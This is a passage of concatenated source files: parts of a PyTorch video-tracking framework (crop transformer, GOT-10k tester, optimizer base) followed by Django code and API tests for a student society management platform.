task_list)[cfg_name]
return cfg_dict
```
#### File: transformer/transformer_impl/random_crop_transformer.py
```python
from typing import Dict
from videoanalyst.data.utils.crop_track_pair import crop_track_pair
from ..transformer_base import TRACK_TRANSFORMERS, TransformerBase
@TRACK_TRANSFORMERS.register
class RandomCropTransformer(TransformerBase):
r"""
Cropping training pair with data augmentation (random shift / random scaling)
Hyper-parameters
----------------
context_amount: float
the context factor for template image
max_scale: float
the max scale change ratio for search image
max_shift: float
the max shift change ratio for search image
max_scale_temp: float
the max scale change ratio for template image
max_shift_temp: float
the max shift change ratio for template image
z_size: int
output size of template image
x_size: int
output size of search image
"""
default_hyper_params = dict(
context_amount=0.5,
max_scale=0.3,
max_shift=0.4,
max_scale_temp=0.0,
max_shift_temp=0.0,
z_size=127,
x_size=303,
)
def __init__(self, seed: int = 0) -> None:
super(RandomCropTransformer, self).__init__(seed=seed)
def __call__(self, sampled_data: Dict) -> Dict:
r"""
sampled_data: Dict()
input data
Dict(data1=Dict(image, anno), data2=Dict(image, anno))
"""
data1_pos = sampled_data["data1_pos"]
data1_neg = sampled_data["data1_neg"]
data2_pos = sampled_data["data2_pos"]
data2_neg = sampled_data["data2_neg"]
im_temp_pos, bbox_temp = data1_pos["image"], data1_pos["anno"]
im_temp_neg = data1_neg['image']
im_curr_pos, bbox_curr = data2_pos["image"], data2_pos["anno"]
im_curr_neg = data2_neg['image']
im_z_pos, im_z_neg, bbox_z, im_x_pos, im_x_neg, bbox_x, _, _ = crop_track_pair(
im_temp_pos,
im_temp_neg,
bbox_temp,
im_curr_pos,
im_curr_neg,
bbox_curr,
config=self._hyper_params,
rng=self._state["rng"])
sampled_data["data1_pos"] = dict(image=im_z_pos, anno=bbox_z)
sampled_data["data1_neg"] = dict(image=im_z_neg, anno=bbox_z)
sampled_data["data2_pos"] = dict(image=im_x_pos, anno=bbox_x)
sampled_data["data2_neg"] = dict(image=im_x_neg, anno=bbox_x)
return sampled_data
```
#### File: tester/tester_impl/got10k.py
```python
import copy
import os.path as osp
from loguru import logger
import torch
import torch.multiprocessing as mp
from videoanalyst.evaluation.got_benchmark.experiments import ExperimentGOT10k
from ..tester_base import TRACK_TESTERS, TesterBase
from .utils.got_benchmark_helper import PipelineTracker
@TRACK_TESTERS.register
class GOT10kTester(TesterBase):
r"""GOT-10k tester
Hyper-parameters
----------------
device_num: int
number of gpus. If set to non-positive number, then use cpu
data_root: str
path to got-10k root
subsets: List[str]
list of subsets name (val|test)
"""
extra_hyper_params = dict(
device_num=1,
data_root="/data/img_120_split",
subsets=["val"], # (val|test)
)
def __init__(self, *args, **kwargs):
super(GOT10kTester, self).__init__(*args, **kwargs)
# self._experiment = None
def update_params(self):
# set device state
num_gpu = self._hyper_params["device_num"]
if num_gpu > 0:
all_devs = [torch.device("cuda:%d" % i) for i in range(num_gpu)]
# all_devs = [torch.device("cuda:1")] #gaidevice
else:
all_devs = [torch.device("cpu")]
self._state["all_devs"] = all_devs
def test(self, ):
tracker_name = self._hyper_params["exp_name"]
all_devs = self._state["all_devs"]
nr_devs = len(all_devs)
for subset in self._hyper_params["subsets"]:
root_dir = self._hyper_params["data_root"]
dataset_name = "GOT-Benchmark" # the name of benchmark toolkit, shown under "repo/logs" directory
save_root_dir = osp.join(self._hyper_params["exp_save"],
dataset_name)
result_dir = osp.join(save_root_dir, "result")
report_dir = osp.join(save_root_dir, "report")
experiment = ExperimentGOT10k(root_dir,
subset=subset,
result_dir=result_dir,
report_dir=report_dir)
# single worker
if nr_devs == 1:
dev = all_devs[0]
self._pipeline.set_device(dev)
pipeline_tracker = PipelineTracker(tracker_name, self._pipeline)
experiment.run(pipeline_tracker)
# multi-worker
else:
procs = []
slicing_step = 1.0 / nr_devs
for dev_id, dev in enumerate(all_devs):
slicing_quantile = (slicing_step * dev_id,
slicing_step * (dev_id + 1))
proc = mp.Process(target=self.worker,
args=(dev_id, dev, subset,
slicing_quantile))
proc.start()
procs.append(proc)
for p in procs:
p.join()
# evalutate
performance = experiment.report([tracker_name], plot_curves=False)
test_result_dict = dict()
if performance is not None:
test_result_dict["main_performance"] = performance[tracker_name][
"overall"]["ao"]
else:
test_result_dict["main_performance"] = -1
return test_result_dict
def worker(self, dev_id, dev, subset, slicing_quantile):
self.set_random_seed()
logger.debug("Worker starts: slice {} at {}".format(
slicing_quantile, dev))
tracker_name = self._hyper_params["exp_name"]
pipeline = self._pipeline
pipeline.set_device(dev)
pipeline_tracker = PipelineTracker(tracker_name, pipeline)
root_dir = self._hyper_params["data_root"]
dataset_name = "GOT-Benchmark" # the name of benchmark toolkit, shown under "repo/logs" directory
save_root_dir = osp.join(self._hyper_params["exp_save"], dataset_name)
result_dir = osp.join(save_root_dir, "result")
report_dir = osp.join(save_root_dir, "report")
experiment = ExperimentGOT10k(root_dir,
subset=subset,
result_dir=result_dir,
report_dir=report_dir)
experiment.run(pipeline_tracker, slicing_quantile=slicing_quantile)
logger.debug("Worker ends: slice {} at {}".format(
slicing_quantile, dev))
GOT10kTester.default_hyper_params = copy.deepcopy(
GOT10kTester.default_hyper_params)
GOT10kTester.default_hyper_params.update(GOT10kTester.extra_hyper_params)
```
#### File: optim/optimizer/optimizer_base.py
```python
from abc import ABCMeta
from typing import Dict
from loguru import logger
from yacs.config import CfgNode
import torch
from torch import nn
from videoanalyst.utils import Registry
from .optimizer_impl.utils.lr_multiply import build as build_lr_multiplier
from .optimizer_impl.utils.lr_policy import build as build_lr_policy
from .optimizer_impl.utils.lr_policy import schedule_lr
OPTIMIZERS = Registry('OPTIMIZERS')
class OptimizerBase:
__metaclass__ = ABCMeta
r"""
base class for Sampler. Reponsible for sampling from multiple datasets and forming training pair / sequence.
Define your hyper-parameters here in your sub-class.
"""
default_hyper_params = dict(
minibatch=1,
nr_image_per_epoch=1,
lr_policy=[],
lr_multiplier=[],
amp=False,
)
def __init__(self, cfg: CfgNode, model: nn.Module) -> None:
r"""
Dataset Sampler, reponsible for sampling from different dataset
Arguments
---------
cfg: CfgNode
node name: optimizer
Internal members
----------------
_model:
underlying nn.Module
_optimizer
underlying optim.optimizer.optimizer_base.OptimizerBase
_scheduler:
underlying scheduler
_param_groups_divider: function
divide parameter for partial scheduling of learning rate
input: nn.Module
output: List[Dict], k-v: 'params': nn.Parameter
"""
self._hyper_params = self.default_hyper_params
self._state = dict()
self._cfg = cfg
self._model = model
self._optimizer = None
self._grad_modifier = None
self.grad_scaler = None
def get_hps(self) -> dict:
r"""
Getter function for hyper-parameters
Returns
-------
dict
hyper-parameters
"""
return self._hyper_params
def set_hps(self, hps: dict) -> None:
r"""
Set hyper-parameters
Arguments
---------
hps: dict
dict of hyper-parameters, the keys must in self.__hyper_params__
"""
for key in hps:
if key not in self._hyper_params:
raise KeyError
self._hyper_params[key] = hps[key]
def update_params(self) -> None:
r"""
an interface for update params
"""
# calculate & update iteration number
self._hyper_params["num_iterations"] = self._hyper_params[
"nr_image_per_epoch"] // self._hyper_params["minibatch"]
# lr_policy
lr_policy_cfg = self._hyper_params["lr_policy"]
if len(lr_policy_cfg) > 0:
lr_policy = build_lr_policy(
lr_policy_cfg, max_iter=self._hyper_params["num_iterations"])
self._state["lr_policy"] = lr_policy
# lr_multiplier
lr_multiplier_cfg = self._hyper_params["lr_multiplier"]
if len(lr_multiplier_cfg) > 0:
lr_multiplier = build_lr_multiplier(lr_multiplier_cfg)
self._state["lr_multiplier"] = lr_multiplier
if "lr_multiplier" in self._state:
params = self._state["lr_multiplier"].divide_into_param_groups(
self._model)
else:
params = self._model.parameters()
self._state["params"] = params
# mix precision
if self._hyper_params["amp"]:
try:
self.grad_scaler = torch.cuda.amp.GradScaler()
except:
logger.error(
"mix precision training is only supported from torch >=1.6")
exit()
logger.info("enabel auto mix precision training")
def set_grad_modifier(self, grad_modifier):
self._grad_modifier = grad_modifier
def zero_grad(self):
self._optimizer.zero_grad()
def step(self):
if self.grad_scaler is not None:
self.grad_scaler.step(self._optimizer)
self.grad_scaler.update()
else:
self._optimizer.step()
def state_dict(self):
return self._optimizer.state_dict()
def load_state_dict(self, state_dict):
self._optimizer.load_state_dict(state_dict)
def schedule(self, epoch: int, iteration: int) -> Dict:
r"""
an interface for optimizer scheduling (e.g. adjust learning rate)
self.set_scheduler need to be called during initialization phase
"""
schedule_info = dict()
if "lr_policy" in self._state:
lr = self._state["lr_policy"].get_lr(epoch, iteration)
schedule_lr(self._optimizer, lr)
schedule_info["lr"] = lr
# apply learning rate multiplication
if "lr_multiplier" in self._state:
self._state["lr_multiplier"].multiply_lr(self._optimizer)
return schedule_info
def modify_grad(self, epoch, iteration=-1):
if self._grad_modifier is not None:
self._grad_modifier.modify_grad(self._model, epoch, iteration)
```
|
{
"source": "JeekStudio/StudentPlatform",
"score": 3
}
|
#### File: StudentPlatform/account/tests.py
```python
from rest_framework.test import APIClient
from testing.testcases import TestCase
# Create your tests here.
class AccountTests(TestCase):
def setUp(self):
self.user = self.createUser('ncjxjj')
def test_login(self):
url = '/api/account/login/'
data = {
'username': 'ncjxjj',
'password': '<PASSWORD>'
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
data = {
'username123': 'ncjxjadaj',
'passwo123rd': '<PASSWORD>'
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 400)
data = {
'username': 'ncjdjj',
'password': '<PASSWORD>'
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 406)
def test_logout(self):
url = '/api/account/logout/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user)
response = client.post(url)
self.assertEqual(response.status_code, 200)
def test_change_password(self):
user = self.createUser(username='ncj')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}
url = '/api/account/change_password/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user)
response = client.post(url, data=data, decode=False)
self.assertEqual(response.status_code, 202)
def test_change_password_with_incorrect_old_password(self):
user = self.createUser(username='ncj')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}
url = '/api/account/change_password/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user)
response = client.post(url, data=data, decode=False)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.data['detail'], '原密码错误')
def test_change_password_with_invalid_form(self):
user = self.createUser(username='ncj')
data = {
'old_password23': '<PASSWORD>',
'new_password1': '<PASSWORD>'
}
url = '/api/account/change_password/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user)
response = client.post(url, data=data, decode=False)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.data['detail'], '表单填写错误')
def test_retrieve_user_identity(self):
student_user = self.createUser('smsnb')
self.createStudent(student_user)
society_user = self.createUser('tjwnb')
self.createSociety(user=society_user, society_id=101, members=None)
sb_user = self.createUser('ncjnb')
self.createSocietyBureau(sb_user)
url = '/api/account/user/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'who are u?')
client.force_authenticate(student_user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'student')
client.force_authenticate(society_user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'society')
client.force_authenticate(sb_user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'society_bureau')
res = self.client.get(url)
self.assertEqual(res.status_code, 403)
def test_password_changed(self):
url = '/api/account/user/'
user1 = self.createUser('123')
user1.set_password('<PASSWORD>')
user1.save()
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user1)
response = client.get(url, encode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['password_changed'], False)
user1.set_password('<PASSWORD>')
user1.save()
response = client.get(url, encode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['password_changed'], True)
```
#### File: society_bureau/api/services.py
```python
import json
from django.utils import timezone
from society_bureau.models import SiteSettings
# Singleton Pattern
class SettingsService:
@classmethod
def get_instance(cls):
default_settings = json.dumps({
'year': timezone.datetime.now().year,
'semester': 1
})
settings = SiteSettings.objects.all().first()
if settings is None:
return SiteSettings.objects.create(settings=default_settings)
return settings
@classmethod
def get_dict(cls):
settings = cls.get_instance()
return json.loads(settings.settings)
@classmethod
def get(cls, key):
settings = cls.get_instance()
return json.loads(settings.settings).get(key, None)
@classmethod
def update(cls, encoded_json):
settings = SiteSettings.objects.all().first()
settings.settings = encoded_json
settings.save()
@classmethod
def set(cls, key, value):
settings_content = cls.get_dict()
settings_content[key] = value
cls.update(json.dumps(settings_content))
```
#### File: society_bureau/api/tests.py
```python
from rest_framework.test import APIClient
from testing.testcases import TestCase
from society.constants import SocietyType, SocietyStatus
from society_manage.models import CreditDistribution
from society.models import Society
from society_bureau.api.services import SettingsService
import json
class DashboardTests(TestCase):
pass
class SocietyManageTests(TestCase):
def setUp(self):
self.user1 = self.createUser('society1')
self.user2 = self.createUser('society2')
self.user3 = self.createUser('society3')
self.user4 = self.createUser('society_bureau')
self.society1 = self.createSociety(
user=self.user1,
name='jeek',
members=None,
society_type=SocietyType.HUMANISTIC
)
self.society2 = self.createSociety(
user=self.user2,
society_id=301,
name='jeek2',
members=None,
society_type=SocietyType.SCIENTIFIC,
status=SocietyStatus.ARCHIVED
)
self.society3 = self.createSociety(
user=self.user3,
society_id=501,
name='jtv',
members=None,
society_type=SocietyType.LEADERSHIP,
status=SocietyStatus.ACTIVE
)
self.society_bureau = self.createSocietyBureau(user=self.user4, real_name='xxx')
def test_retrieve_society(self):
url = '/api/manage/society/{}/'.format(self.society2.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user4)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['society_id'], 301)
self.assertEqual(response.data['name'], 'jeek2')
self.assertEqual(response.data['type'], SocietyType.SCIENTIFIC)
def test_list_societies(self):
url = '/api/manage/society/'
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user4)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 3)
data = {
'name': 'jee'
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
data = {
'type': SocietyType.LEADERSHIP
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['name'], 'jtv')
data = {
'status': SocietyStatus.ACTIVE
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['name'], 'jtv')
def test_list_pagination_societies(self):
users = [self.createUser('society{}'.format(i)) for i in range(4, 51)]
societies = [
self.createSociety(
user=user,
society_id=user.id - 1,
name=user.username,
members=None
) for user in users
]
url = '/api/manage/society/'
data = {
'page': 2,
'page_size': 20
}
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
# default page_size = 10
client.force_authenticate(self.user4)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 10)
self.assertEqual(response.data['results'][0]['id'], 1)
# set page and page_size manually
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
self.assertEqual(response.data['results'][0]['id'], 21)
# max page_size = 50
data = {
'page': 1,
'page_size': 50
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 40)
self.assertEqual(response.data['count'], 50)
self.assertEqual(response.data['results'][-1]['id'], 40)
def test_confirm_society(self):
url = '/api/manage/society/{}/confirm/'.format(self.society3.pk)
data = {
'id': self.society3.pk,
'society_id': 401
}
client = APIClient(enforce_csrf_checks=True)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user4)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
url = '/api/manage/society/{}/confirm/'.format(self.society1.pk)
data = {
'id': self.society1.pk,
'society_id': 301
}
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
data = {
'id': self.society1.pk,
'society_id': ''
}
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 202)
self.society1.refresh_from_db()
self.assertEqual(self.society1.society_id, 401)
self.assertEqual(self.society1.status, SocietyStatus.ACTIVE)
def test_archive_society(self):
credit = CreditDistribution.objects.create(
society=self.society3,
year=SettingsService.get('year'),
semester=SettingsService.get('semester'),
credit=10,
open=True
)
student_user = self.createUser('student')
student = self.createStudent(user=student_user)
credit.receivers.add(student)
self.society3.members.add(student)
url = '/api/manage/society/{}/archive/'.format(self.society1.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.post(url, decode=True)
self.assertEqual(response.status_code, 403)
# test with a waiting society
url = '/api/manage/society/{}/archive/'.format(self.society1.pk)
client.force_authenticate(self.user4)
response = client.post(url, decode=True)
self.assertEqual(response.status_code, 403)
url = '/api/manage/society/{}/archive/'.format(self.society3.pk)
response = client.post(url, decode=True)
self.society3.refresh_from_db()
self.assertEqual(response.status_code, 202)
self.assertIsNone(self.society3.society_id)
self.assertEqual(self.society3.status, SocietyStatus.ARCHIVED)
self.assertEqual(self.society3.user.is_active, False)
self.assertNotIn(student, self.society3.members.all())
self.assertNotIn(student, credit.receivers.all())
def test_destroy_society(self):
url = '/api/manage/society/{}/'.format(self.society3.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 403)
# test with an active society
client.force_authenticate(self.user4)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 403)
url = '/api/manage/society/{}/'.format(self.society2.pk)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 204)
self.assertIsNone(Society.objects.filter(pk=self.society2.pk).first())
def test_export_societies(self):
url = '/api/manage/society/export/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user4)
response = client.post(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEquals(
response.get('Content-Disposition'),
'attachment; filename="export.xlsx"'
)
class CreditReceiversTests(TestCase):
def setUp(self):
self.user1 = self.createUser('society1')
self.user2 = self.createUser('society2')
self.user3 = self.createUser('society_bureau')
self.user4 = self.createUser('student')
self.society1 = self.createSociety(
user=self.user1,
society_id=401,
name='jeek',
members=None,
society_type=SocietyType.HUMANISTIC
)
self.society1.status = SocietyStatus.ACTIVE
self.society1.save()
self.society2 = self.createSociety(
user=self.user2,
society_id=301,
name='jtv',
members=None,
society_type=SocietyType.SCIENTIFIC
)
self.society2.status = SocietyStatus.ACTIVE
self.society2.save()
self.society_bureau = self.createSocietyBureau(user=self.user3, real_name='xxx')
self.student = self.createStudent(user=self.user4)
def test_list_credit_distributions(self):
url = '/api/manage/credit/?year={year}&semester={semester}'.format(
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
# test permissions
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user3)
res = client.get(url, decode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['count'], 0)
CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
CreditDistribution.objects.create(
society=self.society2,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
res = client.get(url, decode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['count'], 2)
def test_retrieve_credit_distribution(self):
credit_distribution = CreditDistribution.objects.create(
society=self.society1,
year=2019,
semester=1,
)
credit_distribution.receivers.add(self.student)
url = '/api/manage/credit/{}/'.format(credit_distribution.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user3)
response = client.get(url, decode=True)
self.assertEqual(response.data['society']['society_id'], self.society1.society_id)
self.assertEqual(response.data['year'], credit_distribution.year)
self.assertEqual(response.data['semester'], credit_distribution.semester)
self.assertEqual(len(response.data['receivers']), 1)
self.assertEqual(response.data['receivers'][0]['name'], self.student.name)
def test_manual_create_credit_distribution(self):
url = '/api/manage/credit/manual_create/'
data = {
'society_id_set': [401, 301],
'year': SettingsService.get('year'),
'semester': SettingsService.get('semester'),
'credit': 20
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
response = client.post(url, data=json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, 201)
cd_set = CreditDistribution.objects.filter(
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.assertEqual(cd_set[0].society, self.society1)
self.assertEqual(cd_set[1].society, self.society2)
self.assertEqual(cd_set[0].credit, 20)
# test create again
# the response status code should be 400
# because of the unique together validator
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
def test_update_credit_distribution(self):
cd = CreditDistribution.objects.create(
society=self.society1,
year=2017,
semester=1,
open=False
)
url = '/api/manage/credit/{}/'.format(cd.pk)
data = {
'open': True,
'credit': 10
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.patch(url, data=data, decode=True)
self.assertEqual(res.status_code, 200)
cd.refresh_from_db()
self.assertEqual(cd.open, True)
self.assertEqual(cd.credit, 10)
def test_bulk_create(self):
url = '/api/manage/credit/bulk_create/'
data = {
'year': SettingsService.get('year'),
'semester': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 201)
CreditDistribution.objects.first().delete()
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 201)
self.assertEqual(CreditDistribution.objects.count(), 2)
data = {
'yea': 1110,
'semester': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 400)
def test_bulk_close(self):
CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
CreditDistribution.objects.create(
society=self.society2,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
url = '/api/manage/credit/bulk_close/'
data = {
'year': SettingsService.get('year'),
'semester': SettingsService.get('semester')
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(CreditDistribution.objects.filter(
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
).first().open, False)
data = {
'year': 1110,
'semester': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 404)
data = {
'yea': 1110,
'semestr': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 400)
def test_destroy(self):
credit_distribution = CreditDistribution.objects.create(
society=self.society1,
year=2020,
semester=1,
)
url = '/api/manage/credit/{}/'.format(credit_distribution.pk)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 204)
class SiteSettingsTest(TestCase):
def setUp(self):
self.user = self.createUser('sb1')
self.createSocietyBureau(user=self.user)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user)
self.client = client
def test_retrieve(self):
url = '/api/manage/settings/'
res = self.client.get(url, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['year'], SettingsService.get('year'))
self.assertEqual(res.data['semester'], SettingsService.get('semester'))
def test_update(self):
url = '/api/manage/settings/'
res = self.client.put(url, data={'year': 2011, 'semester': 2})
self.assertEqual(res.status_code, 202)
res = self.client.put(url, data={'yea': 2011, 'semester': 2})
self.assertEqual(res.status_code, 400)
```
#### File: StudentPlatform/society_bureau/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from student.models import Student
class SocietyBureau(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='society_bureau')
real_name = models.CharField(max_length=64)
qq = models.CharField(max_length=32, blank=True)
phone = models.CharField(max_length=32, blank=True)
email = models.EmailField(blank=True)
password_changed = models.BooleanField(default=False)
def __str__(self):
return self.real_name
class SiteSettings(models.Model):
settings = models.TextField()
```
#### File: society_manage/api/tests.py
```python
import os, json
from PIL import Image, ImageChops
from rest_framework.test import APIClient
from django.utils import timezone
from testing.testcases import TestCase
from society.constants import SocietyType, SocietyStatus, JoinSocietyRequestStatus, ActivityRequestStatus
from society.models import JoinSocietyRequest, ActivityRequest
from society_manage.models import CreditDistribution
from society_bureau.api.services import SettingsService
from society.constants import TEST_FILE_PATH
class SocietyManageMemberTests(TestCase):
def setUp(self):
self.user1 = self.createUser('society1')
self.society = self.createSociety(
user=self.user1,
society_id=101,
members=None,
society_type=SocietyType.HUMANISTIC
)
self.user2 = self.createUser(
username='student'
)
self.student = self.createStudent(
user=self.user2
)
def test_kick_member(self):
url = '/api/society_manage/member/kick/'
data = {
'member_id': self.student.id
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user1)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
self.society.members.add(self.student)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 202)
data = {
'hello': 'ncjnb'
}
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 403)
class SocietyManageJoinRequestTests(TestCase):
def setUp(self):
self.student_user1 = self.createUser(
'ncj1'
)
self.student1 = self.createStudent(
user=self.student_user1
)
self.student_user2 = self.createUser(
'ncj2'
)
self.student2 = self.createStudent(
user=self.student_user2
)
self.society_user = self.createUser(
username='101'
)
self.society = self.createSociety(
user=self.society_user,
members=None,
society_id=101,
society_type=SocietyType.HUMANISTIC
)
self.jr1 = JoinSocietyRequest.objects.create(
society=self.society,
member=self.student1,
status=JoinSocietyRequestStatus.ACCEPTED
)
self.jr2 = JoinSocietyRequest.objects.create(
society=self.society,
member=self.student2
)
def test_list_join_requests(self):
url = '/api/society_manage/join_request/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user)
response = client.get(url, decode=True)
self.assertEqual(response.data['results'][0]['member']['name'], self.student1.name)
self.assertEqual(response.data['results'][1]['member']['class_num'], self.student2.class_num)
data = {
'status': JoinSocietyRequestStatus.ACCEPTED
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['member']['grade'], self.student1.grade)
data = {
'status': JoinSocietyRequestStatus.WAITING
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['member']['grade'], self.student2.grade)
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
def test_update_join_request(self):
url = '/api/society_manage/join_request/{}/'.format(self.jr1.pk)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user)
data = {
'status': JoinSocietyRequestStatus.DENIED
}
response = client.put(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.jr1.refresh_from_db()
self.assertEqual(self.jr1.status, JoinSocietyRequestStatus.DENIED)
class SocietyManageActivityTests(TestCase):
def setUp(self):
self.society_user = self.createUser(
username='101'
)
self.society = self.createSociety(
user=self.society_user,
members=None,
society_id=101,
society_type=SocietyType.HUMANISTIC
)
self.ar1 = ActivityRequest.objects.create(
society=self.society,
title='keep calm',
content='pick hanzo or die',
place='5510',
start_time=timezone.now()
)
self.ar2 = ActivityRequest.objects.create(
society=self.society,
title='make epic shit',
place='little forest',
status=ActivityRequestStatus.ACCEPTED,
start_time=timezone.now()
)
def test_retrieve_activity_requests(self):
url = '/api/society_manage/activity/{}/'.format(self.ar1.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['title'], 'keep calm')
self.assertEqual(response.data['content'], 'pick hanzo or die')
self.assertEqual(response.data['place'], '5510')
def test_list_activity_requests(self):
url = '/api/society_manage/activity/'
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['results'][0]['title'], 'make epic shit')
self.assertEqual(response.data['results'][1]['title'], 'keep calm')
self.assertEqual(response.data['results'][0]['status'], ActivityRequestStatus.ACCEPTED)
data = {
'status': ActivityRequestStatus.ACCEPTED
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['title'], 'make epic shit')
data = {
'status': ActivityRequestStatus.WAITING
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['title'], 'keep calm')
def test_update_activity_requests(self):
url = '/api/society_manage/activity/{}/'.format(self.ar1.pk)
client = APIClient(enforce_csrf_checks=True)
data = {
'status': ActivityRequestStatus.ACCEPTED,
'title': 'do homework',
'place': 'principal room'
}
response = client.patch(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.patch(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.ar1.refresh_from_db()
self.assertEqual(self.ar1.status, ActivityRequestStatus.WAITING) # test read_only
self.assertEqual(self.ar1.title, 'do homework')
self.assertEqual(self.ar1.place, 'principal room')
